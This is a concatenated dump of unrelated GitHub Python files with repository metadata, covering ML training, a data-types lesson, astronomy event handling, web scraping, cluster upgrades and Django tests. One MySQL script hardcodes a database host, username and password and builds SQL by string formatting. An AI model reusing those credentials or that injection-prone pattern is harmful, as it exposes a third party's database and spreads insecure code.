loss.backward()\n self.optimizer.step()\n\n epoch_loss += float(loss) * len(labels)\n epoch_acc += get_batch_accuracy(self.model, images, labels) * len(labels)\n num_samples += len(labels)\n\n epoch_loss /= num_samples\n epoch_acc /= num_samples\n self._metrics[\"training_loss\"].append(epoch_loss)\n self._metrics[\"training_acc\"].append(epoch_acc)\n logger.info(\"Training loss %f\", epoch_loss)\n logger.info(\"Training acc %f\", epoch_acc)\n\n if self.accuracy_criterion:\n model_acc = self.accuracy_criterion(self.model)\n logger.info(\"Test acc: %f\", model_acc)\n self._metrics[\"test_acc\"].append(model_acc)\n if model_acc > self.best_acc:\n logger.info(\"Accuracy improved\")\n self.best_acc = model_acc\n self._metrics[\"best_model\"] = deepcopy(self.model.state_dict())\n logger.info(\"Best acc: %f\", self.best_acc)\n\n self.scheduler.step()\n\n @property\n def metrics(self):\n return deepcopy(self._metrics)\n\n def train(self, num_epochs: int) -> None:\n for _ in tqdm(range(num_epochs)):\n self._train_epoch()\n","repo_name":"Ahmedjjj/Fed_distill","sub_path":"fed_distill/train/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71522957608","text":"#Типы данных\n\n# Изменяемые: списки, словари и множества\n# Неизменяемые: числа, строки, кортежи, frozen-множества, boolean\n\n# int (числа)\nscore = 10\n\n#float (числа с плавающей точкой)\npi_number = 3.14\n\n#string (строки)\nfirst_name = \"Dias\"\nlast_name = 'Dinmukhammeduly'\n\n#boolean (логический тип данных)\nis_student = True\n\n#list (списки)\nnumbers = [-500, 200, 5000000, 0]\n\n#tuple (кортежи)\nvolumes = (1.8, 3.2, 2.8, 4.0)\n\n#dict (словари)\nstudents = {\n 0: score,\n 1: first_name,\n 2: numbers\n}\n","repo_name":"DiasDi/my_repository","sub_path":"lesson2/3_data_types.py","file_name":"3_data_types.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1059022001","text":"from common.item import Item\nfrom typing import List, Optional, Tuple\n\n\nclass Inventory:\n def __init__(self):\n self.storage: List[Optional[Tuple[Item, int]]] = [None for _ in range(16)]\n self.first_free_index = 0\n\n def get_for_objective(self):\n not_none = [x for x in self.storage if x is not None]\n return {item.name:count for item, count in not_none}\n\n def add_item(self, item: Item):\n for i, elem in enumerate(self.storage):\n if elem is None:\n break\n storage_item, count = elem\n if storage_item.name == item.name:\n self.storage[i] = (storage_item, count + 1)\n return\n\n self.storage[self.first_free_index] = (item, 1)\n self.first_free_index += 1\n\n def remove_item(self, item: Item):\n for i, elem in enumerate(self.storage):\n if elem is None:\n break\n storage_item, count = elem\n if storage_item.name == item.name:\n self.storage[i] = (storage_item, count - 1)\n return\n\n def get_count(self, item: Item):\n for i, elem in enumerate(self.storage):\n if elem is None:\n break\n storage_item, count = elem\n if storage_item.name == item.name:\n return count\n return None\n\n def __getitem__(self, i):\n if self.storage[i] is None:\n return None\n return self.storage[i][0]\n","repo_name":"hyunmila/steel-works-jam-2023","sub_path":"src/common/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17657508395","text":"import numpy as np\nimport os\nimport astropy.io.fits as pyfits\nfrom soxs.utils import mylog, get_rot_mat\n\nkey_map = {\"telescope\": \"TELESCOP\",\n \"mission\": \"MISSION\",\n \"instrument\": \"INSTRUME\",\n \"channel_type\": \"CHANTYPE\",\n \"nchan\": \"PHA_BINS\"}\n\n\ndef add_background_from_file(events, event_params, bkg_file):\n from soxs.instrument import perform_dither\n f = pyfits.open(bkg_file)\n\n hdu = f[\"EVENTS\"]\n\n dither_params = {}\n if \"DITHXAMP\" in hdu.header:\n dither_params[\"x_amp\"] = hdu.header[\"DITHXAMP\"]\n dither_params[\"y_amp\"] = hdu.header[\"DITHYAMP\"]\n dither_params[\"x_period\"] = hdu.header[\"DITHXPER\"]\n dither_params[\"y_period\"] = hdu.header[\"DITHYPER\"]\n dither_params[\"plate_scale\"] = hdu.header[\"TCDLT3\"]*3600.0\n dither_params[\"dither_on\"] = True\n else:\n dither_params[\"dither_on\"] = False\n\n sexp = event_params[\"exposure_time\"]\n bexp = hdu.header[\"EXPOSURE\"]\n\n if event_params[\"exposure_time\"] > hdu.header[\"EXPOSURE\"]:\n raise RuntimeError(f\"The background file does not have sufficient \"\n f\"exposure! Source exposure time {sexp}, background \"\n f\" exposure time {bexp}.\")\n\n for k1, k2 in key_map.items():\n if event_params[k1] != hdu.header[k2]:\n raise RuntimeError(f\"'{k1}' keyword does not match! \"\n f\"{event_params[k1]} vs. {hdu.header[k2]}\")\n rmf1 = os.path.split(event_params[\"rmf\"])[-1]\n rmf2 = hdu.header[\"RESPFILE\"]\n arf1 = os.path.split(event_params[\"arf\"])[-1]\n arf2 = hdu.header[\"ANCRFILE\"]\n if rmf1 != rmf2:\n raise RuntimeError(f\"RMFs do not match! {rmf1} vs. {rmf2}\")\n if arf1 != arf2:\n raise RuntimeError(f\"ARFs do not match! {arf1} vs. {arf2}\")\n\n idxs = hdu.data[\"TIME\"] < sexp\n\n mylog.info(f\"Adding {idxs.sum()} background events from {bkg_file}.\")\n\n if event_params[\"roll_angle\"] == hdu.header[\"ROLL_PNT\"]:\n xpix = hdu.data[\"X\"][idxs]\n ypix = hdu.data[\"Y\"][idxs]\n else:\n rot_mat = get_rot_mat(event_params[\"roll_angle\"])\n if dither_params[\"dither_on\"]:\n t = hdu.data[\"TIME\"][idxs]\n x_off, y_off = perform_dither(t, dither_params)\n else:\n x_off = 0.0\n y_off = 0.0\n det = np.array([hdu.data[\"DETX\"][idxs] + x_off -\n event_params[\"aimpt_coords\"][0] -\n event_params[\"aimpt_shift\"][0],\n hdu.data[\"DETY\"][idxs] + y_off -\n event_params[\"aimpt_coords\"][1] -\n event_params[\"aimpt_shift\"][1]])\n xpix, ypix = np.dot(rot_mat.T, det)\n\n xpix += hdu.header[\"TCRPX2\"]\n ypix += hdu.header[\"TCRPX3\"]\n\n all_events = {}\n for key in [\"detx\", \"dety\", \"time\", \"ccd_id\", event_params[\"channel_type\"]]:\n all_events[key] = np.concatenate([events[key], \n hdu.data[key.upper()][idxs]])\n all_events[\"xpix\"] = np.concatenate([events[\"xpix\"], xpix])\n all_events[\"ypix\"] = np.concatenate([events[\"ypix\"], ypix])\n all_events[\"energy\"] = np.concatenate([events[\"energy\"],\n hdu.data[\"ENERGY\"][idxs]*1.0e-3])\n\n f.close()\n\n return all_events\n\n\ndef make_diffuse_background(bkg_events, event_params, rmf, prng=None):\n from soxs.instrument import perform_dither\n\n n_e = bkg_events[\"energy\"].size\n\n bkg_events['time'] = prng.uniform(size=n_e, low=0.0,\n high=event_params[\"exposure_time\"])\n\n x_offset, y_offset = perform_dither(bkg_events[\"time\"],\n event_params[\"dither_params\"])\n\n rot_mat = get_rot_mat(event_params[\"roll_angle\"])\n\n det = np.array([bkg_events[\"detx\"] + x_offset -\n event_params[\"aimpt_coords\"][0] -\n event_params[\"aimpt_shift\"][0],\n bkg_events[\"dety\"] + y_offset -\n event_params[\"aimpt_coords\"][1] -\n event_params[\"aimpt_shift\"][1]])\n pix = np.dot(rot_mat.T, det)\n\n bkg_events[\"xpix\"] = pix[0, :] + event_params['pix_center'][0]\n bkg_events[\"ypix\"] = pix[1, :] + event_params['pix_center'][1]\n\n return bkg_events","repo_name":"daya135k/jzuhonev","sub_path":"soxs/background/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22362124650","text":"from math import sqrt, exp, pi\n\ndef erf(a):\n return (2/sqrt(pi))*exp(-a**2)\n\n\ndef gauss2(a, b):\n\n n = 2\n xi = [-0.57735, 0.57735]\n ci = [1, 1]\n r = 0\n m = (b - a) / 2\n c = (b + a) / 2\n\n for i in range(1, n+1):\n r += ci[i - 1] * erf((m * xi[i - 1] + c))\n r = r * m\n return r\n\nprint(gauss2(0, 1.5))\n\n","repo_name":"nathanwuiske/numerical_methods_python","sub_path":"Gaussian_elimination/gauss.py","file_name":"gauss.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21989185740","text":"#!/bin/python3\n\nimport os\nimport json\nimport re\nfrom PIL import Image\nfrom math import *\n\ndef next_power_of_2(n):\n if n == 0:\n return 1\n if n & (n - 1) == 0:\n return n\n while n & (n - 1) > 0:\n n &= (n - 1)\n return n << 1\n\ndef fix_json_indent(text, indent=3):\n space_indent = indent * 4\n initial = \" \" * space_indent\n json_output = []\n current_level_elems = []\n all_entries_at_level = None # holder for consecutive entries at exact space_indent level\n for line in text.splitlines():\n if line.startswith(initial):\n if line[space_indent] == \" \":\n # line indented further than the level\n if all_entries_at_level:\n current_level_elems.append(all_entries_at_level)\n all_entries_at_level = None\n item = line.strip()\n current_level_elems.append(item)\n if item.endswith(\",\"):\n current_level_elems.append(\" \")\n elif current_level_elems:\n # line on the same space_indent level\n # no more sublevel_entries\n current_level_elems.append(line.strip())\n json_output.append(\"\".join(current_level_elems))\n current_level_elems = []\n else:\n # line at the exact space_indent level but no items indented further\n if all_entries_at_level:\n # last pending item was not the start of a new sublevel_entries.\n json_output.append(all_entries_at_level)\n all_entries_at_level = line.rstrip()\n else:\n if all_entries_at_level:\n json_output.append(all_entries_at_level)\n all_entries_at_level = None\n if current_level_elems:\n json_output.append(\"\".join(current_level_elems))\n json_output.append(line)\n return \"\\n\".join(json_output)\n\nsprites = dict()\nframecount = 0\n\nmaxw = 0\nmaxh = 0\n\nfor file in os.listdir(\"./sprites\"):\n if(file.endswith(\".png\")):\n animation = file[0:-7].replace(\"adventurer-\", \"\")\n index = int(file[-6:-4])\n if(animation not in sprites):\n sprites[animation] = dict()\n sprites[animation][str(index)] = file\n framecount += 1\n\n img = Image.open(\"./sprites/\" + file)\n maxw = max(maxw, img.size[0])\n maxh = max(maxh, img.size[1])\n\ncols = next_power_of_2(int(ceil(sqrt(framecount))))\nrows = int(ceil(float(framecount) / float(cols)))\n\nw = cols * maxw\nh = rows * maxh\n\natlas = Image.new('RGBA', (w, h), (0, 0, 0, 0))\n\nr = 0\nc = 0\n\nfor name, animation in sorted(sprites.items()):\n uvs = list()\n for index, frame in sorted(animation.items()):\n current = Image.open(\"./sprites/\" + frame)\n px = c * maxw\n py = r * maxh\n\n uvs += [[c, r]]\n\n atlas.paste(current, (px, py))\n\n c += 1\n if c == cols:\n c = 0\n r += 1\n\n sprites[name][\"uvs\"] = uvs\n\natlas.save(\"player.png\")\n\nout = json.dumps(sprites, sort_keys=True, indent=4)\n\nout = fix_json_indent(out, 3)\n\nwith open(\"sprites.json\", \"w\") as f:\n f.write(out)\n\nwith open(\"anim.hpp\", \"w\") as f:\n f.write(\"enum Animation : uint8_t {\\n\")\n index = 0\n for animname in sorted(sprites.keys()):\n enumname = \"a_\" + animname.replace(\"-\", \"_\")\n f.write(\"\\t\" + enumname + \",\\n\")\n index += 1\n f.write(\"};\\n\")\n\nwith open(\"anim.cpp\", \"w\") as f:\n f.write(\"const std::vector> Player::animations = {\\n\")\n for animname in sorted(sprites.keys()):\n line = \"\"\n for uv in sprites[animname][\"uvs\"]:\n x = uv[0]\n y = uv[1]\n line += \"ivec2(\" + str(x) + \", \" + str(y) + \"), \"\n f.write(\"\\t{\" + line[:-2] + \"},\\n\")\n f.write(\"};\\n\")","repo_name":"ge0mk/photon","sub_path":"assets/player/spritesheet.py","file_name":"spritesheet.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23241665945","text":"# 假设有打乱顺序的一群人站成一个队列,数组 people 表示队列中一些人的属性(不一定按顺序)。\n# 每个 people[i] = [hi, ki] 表示第 i 个人的身高为 hi ,前面 正好 有 ki 个身高大于或等于 hi 的人。\n#\n# 请你重新构造并返回输入数组 people 所表示的队列。返回的队列应该格式化为数组 queue ,\n# 其中 queue[j] = [hj, kj] 是队列中第 j 个人的属性(queue[0] 是排在队列前面的人)。\n#\n\n# h升序,k降序,则k代表当前剩余位置中的索引\npeople = [[7,0],[4,4],[7,1],[5,0],[6,1],[5,2]]\n\ndef reconstructQueue(people):\n res = [[0, 0]] * len(people)\n index = list(range(len(people)))\n people = sorted(people, key = lambda item: (item[0], -item[1]))\n for p in people:\n idx = index[p[1]]\n res[idx] = p\n index.pop(p[1])\n return res\n\n\"\"\"\n# 二刷,h降序,k升序。由于在遍历每一个p时,所有身高比其高的都已经被确定位置,所以其索引就是k(后面没有可能出现比他高的)\nclass Solution:\n def reconstructQueue(self, people: List[List[int]]) -> List[List[int]]:\n people = sorted(people, key = lambda item: [-item[0], item[1]])\n ret = []\n for p in people:\n ret.insert(p[1], p)\n return ret\n\"\"\"\nprint(reconstructQueue(people))","repo_name":"vandeppce/algorithm","sub_path":"9.greedy/406*ReconstructQueue.py","file_name":"406*ReconstructQueue.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33977480087","text":"# # PR 3 DESEMBER 2019\r\n# kata = input('silahkan ketik sebuah kalimat: ')\r\n# def jumlah_kata(kata):\r\n# my_string = kata.lower().split()\r\n# my_dict = {}\r\n# for item in my_string:\r\n# if item in my_dict:\r\n# my_dict[item] += 1\r\n# else:\r\n# my_dict[item] = 1\r\n# print(my_dict)\r\n# for key, val in my_dict.items():\r\n# print(\"Jumlah kata '{}' ada sebanyak {}\".format (key.title(), val))\r\n\r\n# jumlah_kata(kata)\r\n\r\n# # PR BONUS 3 DESEMBER 2019\r\nimport sys\r\nimport random\r\nmy_list = []\r\nn = int(input('Masukkan ukuran:'))\r\n\r\ndef list_angka(my_list):\r\n num = 1\r\n for row in range(n):\r\n my_list=[]\r\n for col in range(n):\r\n my_list.append(num)\r\n print(num,end=\" \")\r\n num += 1\r\n print()\r\n\r\n# # Function to rotate the matrix\r\ndef rotateright(my_list):\r\n for c in range(3):\r\n list_kanan = []\r\n for i in range(len(my_list)):\r\n list_temp = []\r\n for j in range((my_list(n)-1),-1,-1):\r\n list_temp.append(my_list[j][i])\r\n list_kanan.append(list_temp)\r\n my_list = list_kanan\r\n \r\ndef menu(my_list):\r\n print('Pilih'+'\\n'+'1. Angka Urut'+'\\n'+'2. Angka Random')\r\n pilihan = int(input('Masukkan pilihan: '))\r\n if pilihan == 1:\r\n list_angka(my_list)\r\n pilihan_kika = input('Putar ke arah? ')\r\n if pilihan_kika == 'kanan':\r\n pilih3 = int(input('berapa kali?: '))\r\n if pilih3 >= 1:\r\n rotateright(my_list)\r\n if pilihan_kika == 'kiri':\r\n pilih3 = int(input('berapa kali?: '))\r\n if pilih3 >= 1:\r\n print('Kondisi belum dibuat')\r\n pilih4 = input('apakah anda ingin melanjutkan?(Y / N): ')\r\n if pilih4 == \"Y\":\r\n menu(my_list)\r\n if pilih4 == \"N\":\r\n sys.exit\r\nmenu(my_list)","repo_name":"catinugraha/Python_Fundamental","sub_path":"PR_intro4.py","file_name":"PR_intro4.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7033151586","text":"# -*- coding: UTF-8 -*- \n#!/usr/bin/python\n\nimport MySQLdb\nimport json\nimport urllib\n\n# Open database connection\ndb = MySQLdb.connect(\"140.138.77.104\",\"BDSTeam08\",\"BDSTeam08@2015\",\"BDSTeam08_DB\" )\n\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\n\nsql = \"INSERT INTO pet_1001514(pet_name, \\\n pet_owner, pet_specise, pet_sex, pet_birth) \\\n VALUES ('%s', '%s', '%s', '%s', '%s' )\" % \\\n ( Mac , Mac1 , Mac2 , Mac3 , '0000-00-00' ) \ntry : \n #執行sql語句\n cursor . execute ( sql ) \n #提交到數據庫執行\n db . commit () \nexcept : \n #發生錯誤時回滾\n db . rollback ()\n\n#關閉數據庫連接\ndb . close ()\n\n# execute SQL query using execute() method.\n# cursor.execute(\"SELECT VERSION()\")\n\n# # Fetch a single row using fetchone() method.\n# data = cursor.fetchone()\n\n# print \"Database version : %s \" % data\n\n# # disconnect from serve\n\n# sql = \"\"\"INSERT INTO EMPLOYEE(FIRST_NAME,\n# LAST_NAME, AGE, SEX, INCOME)\n# VALUES ('Mac', 'Mohan', 20, 'M', 2000)\"\"\"\n\n\n# sql = \"INSERT INTO EMPLOYEE(FIRST_NAME, \\\n# LAST_NAME, AGE, SEX, INCOME) \\\n# VALUES ('%s', '%s', '%d', '%c', '%d' )\" % \\\n# ( 'Mac' , 'Mohan' , 20 , 'M' , 2000 ) \n\n\n# db.close()","repo_name":"fifiteen82726/python_craw","sub_path":"inseart_data_to_DB.py","file_name":"inseart_data_to_DB.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2413862125","text":"\"\"\"\n.. module:: bidr.apps.organizations.test_forms\n :synopsis: Bidr Silent Auction System Organization Form Tests.\n\n.. moduleauthor:: Alex Kavanaugh \n\n\"\"\"\n\nfrom django.contrib.auth import get_user_model\nfrom django.test.client import RequestFactory\nfrom django.test.testcases import TestCase\n\nfrom .forms import OrganizationCreateForm\n\n\nclass TestOrganizationCreateForm(TestCase):\n\n def setUp(self):\n self.request = RequestFactory()\n self.request.user = get_user_model().objects.create_user(\n \"The Dude\", \"thedudeabides@dudeism.com\", \"+13107824229\", \"!\"\n )\n\n def test_form_valid_all_fields(self):\n data = {\n \"name\": \"test_name\", \"owner\": self.request.user.id, \"email\": \"test@email.com\",\n \"phone_number\": \"+18056413215\", \"website\": \"http://test.com\"\n }\n form = OrganizationCreateForm(request=self.request, data=data)\n self.assertTrue(form.is_valid())\n\n def test_form_valid_mandatory_fields_with_fake_user(self):\n data = {\"name\": \"test_name\", \"owner\": self.request.user.id}\n form = OrganizationCreateForm(request=self.request, data=data)\n self.assertTrue(form.is_valid())\n\n def test_form_invalid_missing_name(self):\n data = {\n \"email\": \"test@email.com\", \"owner\": self.request.user.id,\n \"phone_number\": \"+18056413215\", \"website\": \"http://test.com\"\n }\n form = OrganizationCreateForm(request=self.request, data=data)\n self.assertFalse(form.is_valid())\n self.assertEqual(1, len(form.errors))\n self.assertIn(\"name\", form.errors)\n\n def test_form_valid_no_website_protocol(self):\n data = {\n \"name\": \"test_name\", \"email\": \"test@email.com\", \"owner\": self.request.user.id,\n \"phone_number\": \"+18056413215\", \"website\": \"test.com\"\n }\n form = OrganizationCreateForm(request=self.request, data=data)\n self.assertTrue(form.is_valid())\n","repo_name":"kavdev/bidr_project","sub_path":"bidr/apps/organizations/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33819910714","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom currency_converter import CurrencyConverter\r\nfrom datetime import date\r\nimport re\r\n\r\n\r\n\r\ndef ebookers_hotel(hotelname,destinationHotel,checkInDate,checkOutDate,rooms,adults,children):\r\n childstr='0'\r\n if int(children)>0:\r\n childstr = '1_10'\r\n if int(children)>1:\r\n for i in range(int(children)-1):\r\n childstr = childstr+',1_10'\r\n\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15\",\r\n \"Accept-Language\": \"en-gb \",\r\n \"Accept-Encoding\" : \"br, gzip, deflate\",\r\n \"Accept\" : \"test/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Referer\" : \"http://www.google.com/\",\r\n }\r\n url=\"https://www.ebookers.com/Hotel-Search?destination=\"+'+'.join(destinationHotel.split(' '))+\"&hotelName=\"+'+'.join(destinationHotel.split(' '))+\"&startDate=\"+checkInDate+\\\r\n \"&endDate=\"+checkOutDate+\"&d1=\"+checkInDate+\"&d2=\"+checkOutDate+\"&rooms=\"+rooms+\"&adults=\"+adults+\"&children=\"+childstr\r\n\r\n response=requests.get(url,headers=headers)\r\n soup=BeautifulSoup(response.content,'html.parser')\r\n containers = soup.find_all(class_=\"uitk-card-content uitk-grid uitk-cell all-y-padding-three all-x-padding-three listing-content\")\r\n sitehotelname=None\r\n price=None\r\n for container in containers:\r\n if re.sub(r'[^\\w]', '',container.find(\"h3\",{\"data-stid\":\"content-hotel-title\"}).text.lower())==re.sub(r'[^\\w]', '',hotelname.lower()):\r\n targethotel=container\r\n sitehotelname=targethotel.find(\"h3\",{\"data-stid\":\"content-hotel-title\"}).text.lower()\r\n price=targethotel.find(\"span\",{\"data-stid\":\"content-hotel-lead-price\"}).text if targethotel.find(\"span\",{\"data-stid\":\"content-hotel-lead-price\"}) is not None else None\r\n extramessages = targethotel.find(\"div\", {\"data-stid\": \"supporting-messages-0\"}).text if targethotel.find(\"div\", {\"data-stid\": \"supporting-messages-0\"}) is not None else 'No Message'\r\n\r\n #Mporo na parw kai asteria kai bathmologia pelaton\r\n finalprice=None\r\n conv=CurrencyConverter()\r\n\r\n checkin_split=[int(x) for x in checkInDate.split('-')]\r\n checkout_split=[int(x) for x in checkOutDate.split('-')]\r\n st_date=date(checkin_split[0],checkin_split[1],checkin_split[2])\r\n end_date=date(checkout_split[0],checkout_split[1],checkout_split[2])\r\n delta=end_date-st_date\r\n\r\n if sitehotelname and price:\r\n price=price.replace('£','')\r\n price=price.replace(',','')\r\n finalprice=str(conv.convert(int(price)/delta.days,'GBP','EUR'))\r\n elif price=='':\r\n finalprice='Sold Out'\r\n else:\r\n finalprice='Not Found'\r\n return finalprice","repo_name":"farinisgeorge/Pricelytical","sub_path":"Pricelytical_Scraper/Server/ebookers/ebookers_main.py","file_name":"ebookers_main.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13245773895","text":"# encoding: utf-8\nfrom __future__ import unicode_literals\n\nimport argparse\nimport os\n\nfrom .ansible import AnsibleBastionHost\nfrom .cmd import run_ansible_playbook\nfrom .utils import get_major_version\nfrom .cluster import construct_cluster\n\n\nUPGRADE_MSG = \"\"\"\n┌───────────────────────────────────────────────────────────────────────────────┐\n│ │\n│ The system has been upgraded to the latest version. │\n│ │\n└───────────────────────────────────────────────────────────────────────────────┘\n\n\"\"\"\n\n\n\ndef add_command(subparsers):\n parser = subparsers.add_parser(\n \"upgrade\", help=\"upgrade onecloud cluster to specified version\")\n #parser.add_argument('config', help=\"config file\")\n # requirement options\n parser.add_argument(\"primary_master_host\",\n metavar=\"FIRST_MASTER_HOST\",\n help=\"onecloud cluster primary master host, \\\n e.g., 10.1.2.56\")\n parser.add_argument(\"version\",\n metavar=\"VERSION\",\n help=\"onecloud version to be upgrade, \\\n e.g., v3.6.9\")\n\n # optional options\n help_d = lambda help: help + \" (default: %(default)s)\"\n\n parser.add_argument(\"--user\", \"-u\",\n dest=\"ssh_user\",\n default=\"root\",\n help=help_d(\"primary master host ssh user\"))\n\n parser.add_argument(\"--key-file\", \"-k\",\n dest=\"ssh_private_file\",\n default=os.path.expanduser(\"~/.ssh/id_rsa\"),\n help=help_d(\"primary master ssh private key file\"))\n\n parser.add_argument(\"--port\", \"-p\",\n dest=\"ssh_port\",\n type=int,\n default=\"22\",\n help=help_d(\"primary master host ssh port\"))\n\n parser.add_argument(\"--as-bastion\", \"-B\",\n dest=\"primary_as_bastion\",\n action=\"store_true\",\n help=\"use primary master node as ssh bastion host to run ansible\")\n\n parser.set_defaults(func=do_upgrade)\n\n\ndef do_upgrade(args):\n cluster = construct_cluster(\n args.primary_master_host,\n args.ssh_user,\n args.ssh_private_file,\n args.ssh_port)\n cur_ver = cluster.get_current_version()\n\n config = UpgradeConfig(cur_ver, args.version)\n\n bastion_host = None\n if args.primary_as_bastion:\n bastion_host = AnsibleBastionHost(args.primary_master_host)\n\n inventory_content = cluster.generate_playbook_inventory(bastion_host)\n inventory_f = '/tmp/test-hosts.ini'\n with open(inventory_f, 'w') as f:\n f.write(inventory_content)\n # start run upgrade playbook\n return_code = run_ansible_playbook(\n inventory_f,\n './onecloud/upgrade-cluster.yml',\n vars=config.to_ansible_vars(),\n )\n if return_code is not None and return_code != 0:\n return return_code\n cluster.set_current_version(args.version)\n print(UPGRADE_MSG.encode('utf-8'))\n\n\nclass UpgradeConfig(object):\n\n def __init__(self, cur_ver, upgrade_ver):\n self.current_onecloud_version = cur_ver\n self.current_onecloud_major_version = get_major_version(cur_ver)\n self.upgrade_onecloud_version = upgrade_ver\n self.upgrade_onecloud_major_version = get_major_version(upgrade_ver)\n\n def is_major_upgrade(self):\n return self.current_onecloud_major_version != self.upgrade_onecloud_major_version\n\n def get_yunion_yum_repo(self):\n ver = self.upgrade_onecloud_major_version.replace('_', '.')\n ver = ver[1:]\n return \"https://iso.yunion.cn/yumrepo-%s/yunion.repo\" % (ver)\n\n def to_ansible_vars(self):\n return {\n \"current_onecloud_version\": self.current_onecloud_version,\n \"current_onecloud_major_version\": self.current_onecloud_major_version,\n \"upgrade_onecloud_version\": self.upgrade_onecloud_version,\n \"upgrade_onecloud_major_version\": self.upgrade_onecloud_major_version,\n \"is_major_upgrade\": self.is_major_upgrade(),\n \"yunion_yum_repo\": self.get_yunion_yum_repo(),\n }\n","repo_name":"robert871126/ocboot","sub_path":"lib/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"38632503528","text":"import sys\n\nimport mne\nimport numpy as np\nfrom nitime import TimeSeries\nfrom nitime.analysis import CorrelationAnalyzer\nfrom scipy.io import loadmat\n\nfrom my_settings import (source_folder)\n\nsubject = sys.argv[1]\n\ntimes = np.arange(-4000, 1001, 1)\ntimes = times / 1000.\n\nht_cls = loadmat(source_folder +\n \"ave_ts/mat_files/%s_classic_ts_DKT_snr-3_orth-epo.mat\" %\n subject)[\"data_org\"]\nht_pln = loadmat(source_folder +\n \"ave_ts/mat_files/%s_plan_ts_DKT_snr-3_orth-epo.mat\" %\n subject)[\"data_org\"]\nht_int = loadmat(source_folder +\n \"ave_ts/mat_files/%s_interupt_ts_DKT_snr-3_orth-epo.mat\" %\n subject)[\"data_org\"]\n\nresults_cls = {}\nresults_pln = {}\nresults_int = {}\n\ntois = {\n \"pln\": [1250, 1750],\n \"pre-press\": [3500, 4000],\n \"post-press\": [4001, 4500]\n}\n\nfor toi in tois.keys():\n corr_cls = []\n corr_pln = []\n corr_int = []\n\n ht_cls_bs = mne.baseline.rescale(\n ht_cls,\n times,\n baseline=(-3.8, -3.3),\n mode=\"mean\")\n\n ht_pln_bs = mne.baseline.rescale(\n ht_pln,\n times,\n baseline=(-3.8, -3.3),\n mode=\"mean\")\n ht_int_bs = mne.baseline.rescale(\n ht_pln,\n times,\n baseline=(-3.8, -3.3),\n mode=\"mean\")\n\n for ts in ht_cls_bs:\n nits = TimeSeries(\n ts[:, tois[toi][0]:tois[toi][1]],\n sampling_rate=1000) # epochs_normal.info[\"sfreq\"])\n\n corr_cls += [CorrelationAnalyzer(nits)]\n\n for ts in ht_pln_bs:\n nits = TimeSeries(\n ts[:, tois[toi][0]:tois[toi][1]],\n sampling_rate=1000) # epochs_normal.info[\"sfreq\"])\n\n corr_pln += [CorrelationAnalyzer(nits)]\n\n for ts in ht_int_bs:\n nits = TimeSeries(\n ts[:, tois[toi][0]:tois[toi][1]],\n sampling_rate=1000) # epochs_normal.info[\"sfreq\"])\n\n corr_int += [CorrelationAnalyzer(nits)]\n\n results_cls = np.asarray([c.corrcoef for c in corr_cls])\n results_pln = np.asarray([c.corrcoef for c in corr_pln])\n results_int = np.asarray([c.corrcoef for c in corr_int])\n\n np.save(source_folder + \"graph_data/%s_classic_corr_%s_orth.npy\" %\n (subject, toi), results_cls)\n np.save(source_folder + \"graph_data/%s_plan_corr_%s_orth.npy\" %\n (subject, toi), results_pln)\n np.save(source_folder + \"graph_data/%s_interupt_corr_%s_orth.npy\" %\n (subject, toi), results_int)\n","repo_name":"MadsJensen/RP_scripts","sub_path":"create_network_matrice_orth.py","file_name":"create_network_matrice_orth.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33461304022","text":"\"\"\"Handle HTTP methods for server.\"\"\"\nimport json\nfrom collections.abc import AsyncIterator, Iterator\nfrom math import ceil\nfrom typing import Any, Optional\n\nimport aiohttp_session\nimport ujson\nfrom aiohttp import web\nfrom aiohttp.web import Request, Response\nfrom multidict import CIMultiDict\n\nfrom metadata_backend.message_broker.mq_service import MQPublisher\n\nfrom ...conf.conf import WORKFLOWS, schema_types\nfrom ...helpers.logger import LOG\nfrom ...helpers.schema_loader import JSONSchemaLoader, SchemaNotFoundException\nfrom ...helpers.workflow import Workflow\nfrom ...services.datacite_service_handler import DataciteServiceHandler\nfrom ...services.metax_service_handler import MetaxServiceHandler\nfrom ...services.rems_service_handler import RemsServiceHandler\nfrom ..operators.object import ObjectOperator\nfrom ..operators.submission import SubmissionOperator\nfrom ..operators.user import UserOperator\n\n\nclass RESTAPIHandler:\n \"\"\"Handler for REST API methods.\"\"\"\n\n def _check_schema_exists(self, 